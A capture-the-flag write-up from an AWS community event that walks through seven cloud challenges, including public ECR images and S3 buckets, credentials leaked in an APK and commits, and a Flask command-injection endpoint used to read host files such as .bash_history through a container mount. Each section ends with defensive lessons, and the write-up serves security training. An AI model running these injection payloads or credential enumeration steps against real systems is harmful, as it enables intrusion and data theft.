AWS Student Community Day Nepal CTF Writeup

AWS Student Community Day Nepal CTF Writeup

MISTAKEN IMAGE

This challenge involves finding out the ECR image which was mistakenly made public and exposed some doors over the internet.

Navigate over Gallery of ECR image. Search out the r4s1p1w2/awscloudclubnepal.

Pulled the ECR image and ran the image as a container.

docker pull public.ecr.aws/r4s1p1w2/awscloudclubnepal:latest
sudo docker run -it public.ecr.aws/r4s1p1w2/awscloudclubnepal
/ # ls
bin    etc    home   media  opt    root   sbin   sys    usr
dev    flag   lib    mnt    proc   run    srv    tmp    var
/ # cd flag
/flag # ls
flag.txt
/flag # cat flag.txt 
CTF{nyLLUw66QXkETtij}

Flag: CTF{nyLLUw66QXkETtij}

Key Lessons

  • Ensure ECR images are private unless there is a specific need for them to be public.

PWNED THE BUCKET

This challenge involves identifying an S3 bucket, exploiting misconfiguration, and uncovering the useful data stored in an S3 bucket.

  • Input: ctf.csaju.com

  • Hint: Use an S3 inspector tool like S3Khoj to find sensitive files in the public bucket.

Use nslookup for further information gathering and check where ctf.csaju.com points to.

> nslookup ctf.csaju.com
Server: 1.1.1.1
Address: 1.1.1.1#53

Non-authoritative answer:
ctf.csaju.com canonical name = awscommunitydayctf.s3.ap-south-1.amazonaws.com.
awscommunitydayctf.s3.ap-south-1.amazonaws.com canonical name = s3-r-w.ap-south-1.amazonaws.com.

Name: s3-r-w.ap-south-1.amazonaws.com
Address: 52.219.66.51

Browse and extract object from s3 bucket “awscommunitydayctf.s3.ap-south-1.amazonaws...

check the pdf/main.inc

Flag: CTF{vZoF4sRjNxTVJXrI}

Key Lessons

  • Ensure the bucket’s permission is correctly set to prevent unauthorized access and public buckets should be avoided unless explicitly required.

  • Implement workflows to monitor changes in bucket configurations, ensuring any accidental exposure is detected and mitigated promptly.

BREACHED THE DB

This challenge involved the exposure of the database and led to several stuff.

Fuzz out the URL and you will be able to perform GET over url/.secrets/backup.db

curl https://awscloudclubnepal.com/.secrets/backup.db

Once you have downloaded the file. Import the backup.db using sqlite3.

sqlite3 backup.db

You can export those credentials on a custom AWS profile or override your default profile.

aws --region us-east-1 --profile custom-profile dynamodb scan --table-name awscloudclubnepal

Flag: CTF{rMACjkeAqN9pFOAo}

SERVERLESS

This challenge is about the enumeration of serverless function apps.

Let’s export noted credentials in our default profile or custom one which was exposed by the developer accidentally over commit messages.

aws lambda list-functions --region ap-south-1
{
 "Functions": [
 {
 "FunctionName": "EnvBreaches",
 "FunctionArn": "arn:aws:lambda:ap-south-1:288761734723:function:EnvBreaches",
 "Runtime": "python3.10",
 "Role": "arn:aws:iam::288761734723:role/service-role/EnvBreaches-role-9b68sucr",
 "Handler": "lambda_function.lambda_handler",
 "CodeSize": 420,
 "Description": "A starter AWS Lambda function.",
 "Timeout": 3,
 "MemorySize": 128,
 "LastModified": "2024-09-24T11:26:41.000+0000",
 "CodeSha256": "v1xwIoDXIUeuD0DlTfWkCCHYaQpg/RAtlvvfc1IfpV4=",
 "Version": "$LATEST",
 "Environment": {
 "Variables": {
 "SECRET_KEY": "CTF{wow_congrats}"
 }
 },
 "TracingConfig": {
 "Mode": "PassThrough"
 },

Flag: CTF{wow_congrats}

Key Lessons

  • Review git logs regularly to ensure sensitive information hasn’t been accidentally pushed.

  • Pre-commit hooks to scan for sensitive information before the developer commits to the repository.

BALTI

This challenge is about reverse engineering and finding out the flag one.

  • Input: Reverse engineer the provided APK file and find the flag.

  • Hint: Name of the challenge and access through it

Use Android RE tools like apktool or jadx to decompile apk files. Using jadx you can able to see hardcoded AWS credentials on the codebase. AWS credentials allow you to authenticate and interact with AWS services.

Let’s export those credentials first and perform some enumeration.

aws sts get-caller-identity
{
 "UserId": "AIDAUGO4KMZB4PGSYXVZZ",
 "Account": "288761734723",
 "Arn": "arn:aws:iam::288761734723:user/mobile"
}

Next will be listing out the IAM policies attached to the user account[mobile]. We can see that user has S3 and IAM policy resources.

aws iam list-attached-user-policies --user-name mobile
{
 "AttachedPolicies": [
 {
 "PolicyName": "oggy_bhai",
 "PolicyArn": "arn:aws:iam::288761734723:policy/oggy_bhai"
 },
 {
 "PolicyName": "IAMReadOnlyAccess",
 "PolicyArn": "arn:aws:iam::aws:policy/IAMReadOnlyAccess"
 }
 ]
}

Let’s examine the permission of oggy_bhai policy. This policy grants read access to specific S3 buckets.

aws iam get-policy-version --policy-arn arn:aws:iam::288761734723:policy/oggy_bhai --version-id v11
 {
 "PolicyVersion": {
 "Document": {
 "Version": "2012-10-17",
 "Statement": [
 {
 "Sid": "AllowSpecificBucketActions",
 "Effect": "Allow",
 "Action": [
 "s3:GetObject",
 "s3:ListBucket"
 ],
 "Resource": [
 "arn:aws:s3:::oggyandcockroachesbucket",
 "arn:aws:s3:::oggyandcockroachesbucket/*"
 ]
 },
 {
 "Sid": "AllowIAMPolicyReadAccess",
 "Effect": "Allow",
 "Action": [
 "iam:GetPolicy",
 "iam:GetPolicyVersion"
 ],
 "Resource": "arn:aws:iam::288761734723:policy/oggy_bhai"
 }
 ]
 },
 "VersionId": "v11",
 "IsDefaultVersion": true,
 "CreateDate": "2024-09-27T11:11:45+00:00"
 }
}

Since the policy allows access to the oggyandcockraochesbucket bucket, let’s list the contents and sync them locally.

aws s3 ls s3://oggyandcockroachesbucket
oggy.txt
aws s3 sync s3://oggyandcockroachesbucket .
download: s3://oggyandcockroachesbucket/oggy.txt to ./oggy.txt
cat oggy.txt
tLgxjcbrlmkAoYdR

Flag: CTF{tLgxjcbrlmkAoYdR}

Key Lessons

  • Avoid hardcoding sensitive credentials in your application codebase.

  • Always follow the principle of least privilege. Over-permissive policies can lead to serious security breaches.

ESCAPE YOUR VESSEL

This challenge was around discovering the hidden endpoints on a web server running inside the container and having container privilege escalation vulnerability.

  • Input: 13.234.195.12

  • Hint: Check over Docker privilege escalation

To begin, let’s fuzz the input URL for hidden endpoints. I used ffuf to identify hidden endpoints with my custom directory wordlist.

ffuf -w common.txt -u http://13.234.195.12/FUZZ
 /'___\  /'___\           /'___\       
 /\ \__/ /\ \__/  __  __  /\ \__/       
 \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
 \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
 \ \_\   \ \_\  \ \____/  \ \_\       
 \/_/    \/_/   \/___/    \/_/        v2.1.0-dev
________________________________________________ :: Method           : GET
 :: URL              : http://13.234.195.12/FUZZ
 :: Wordlist         : FUZZ: /home/Documents/ctf/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________hi                      [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 52ms]
health                  [Status: 200, Size: 10, Words: 3, Lines: 1, Duration: 67ms]
:: Progress: [4734/4734] :: Job [1/1] :: 283 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
Copy

wordlist: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt

From this, we discovered two endpoints

  • /hi

  • Accept POST requests

  • /health

  • Accept GET request that returned a simple health check-update

We then tested the endpoint by sending a POST request with a simple command injection payload.

curl -X POST http://13.234.195.12/hi -d 'command=ls'
Dockerfile
app.py

The endpoint was vulnerable to command injection which allows us to execute system commands. Let’s investigate the source code to understand how it works.

curl -X POST http://13.234.195.12/hi -d 'command=cat Dockerfile'
FROM python:3.9-slimWORKDIR /appCOPY . /appRUN pip install flaskEXPOSE 80CMD ["python", "app.py"]

Dockerfile revealed that app was running a flask server.

curl -X POST http://13.234.195.12/hi -d 'command=cat Dockerfile'
from flask import Flask, requestimport osapp = Flask(__name__)@app.route('/')
def home():
 return 'Welcome to AWS Student Community Day'@app.route('/health')
def health():
 return 'Site is up'
@app.route('/hi', methods=['POST'])
def execute():
 command = request.form.get('command')
 result = os.popen(command).read()
 return resultif __name__ == '__main__':
 app.run(host='0.0.0.0', port=80)

From here, the execute() function in /hi endpoint allowed commands to be executed on the underlying system. During further investigation, the container had access to the host’s file system. The host directory was mapped to the root of the host machine. Let’s confirm.

curl -X POST http://13.234.195.12/hi -d 'command=df -h'
Filesystem      Size  Used Avail Use% Mounted on
overlay         6.8G  3.2G  3.6G  47% /
tmpfs            64M     0   64M   0% /dev
shm              64M     0   64M   0% /dev/shm
/dev/root       6.8G  3.2G  3.6G  47% /host
devtmpfs        2.0G     0  2.0G   0% /host/dev
tmpfs           2.0G     0  2.0G   0% /host/dev/shm
tmpfs           783M 1004K  782M   1% /host/run
tmpfs           5.0M     0  5.0M   0% /host/run/lock
/dev/loop1       26M   26M     0 100% /host/snap/amazon-ssm-agent/7993
/dev/loop0       56M   56M     0 100% /host/snap/core18/2829
/dev/loop2       39M   39M     0 100% /host/snap/snapd/21759
/dev/xvda16     881M  133M  687M  17% /host/boot
/dev/xvda15     105M  6.1M   99M   6% /host/boot/efi
/dev/loop3       56M   56M     0 100% /host/snap/core18/2846
/dev/loop4       75M   75M     0 100% /host/snap/core22/1621
/dev/loop5       26M   26M     0 100% /host/snap/amazon-ssm-agent/9565

Let’s inspect the bash history of the host’s user so we can retire content from files.

curl -X POST http://13.234.195.12/hi -d 'command=cat /host/home/ubuntu/.bash_history'

Based on bash_history, recent changes were at /var/log directory and some files. Let’s retrieve content there.

curl -X POST http://13.234.195.12/hi -d 'command=cat /host/var/log/flag.txt'

Flag: CTF{PC1RVV1ZA2OI5AP}

Key Lessons

  • Always sanitize user inputs to prevent attackers from executing arbitrary commands.

  • Ensure your container doesn’t have unnecessary access to the host file system.

EXPOSED VOLUME

This challenge was about exploiting a public snapshot of the volume.

Let’s dive into robots.txt of awscloudclubnepal.com The content of the robots.txt file revealed a snapshot.

Let’s confirm whether the snapshot is public or not. A developer might accidently make the snapshot public leading to more exposure to their environment.

Let’s mount the snapshot to our instance to explore the contents of the volume. You should provision out the instances initially.

You have options to create the volume or release the image. Create a new volume from the snapshot.

Attached it to a running healthy instance.

Mount it to the file system and explore the content of the file of the snapshot’s volume.

Flag: CTF{LaYwf9G121YxnjKY}

Key Lessons

  • Ensure that snapshots in AWS are not publicly accessible unless intended.

  • Regularly audit your cloud environment for misconfiguration like public snapshots.

Reference

AWS Student Community Day Nepal CTF Writeup | CSaju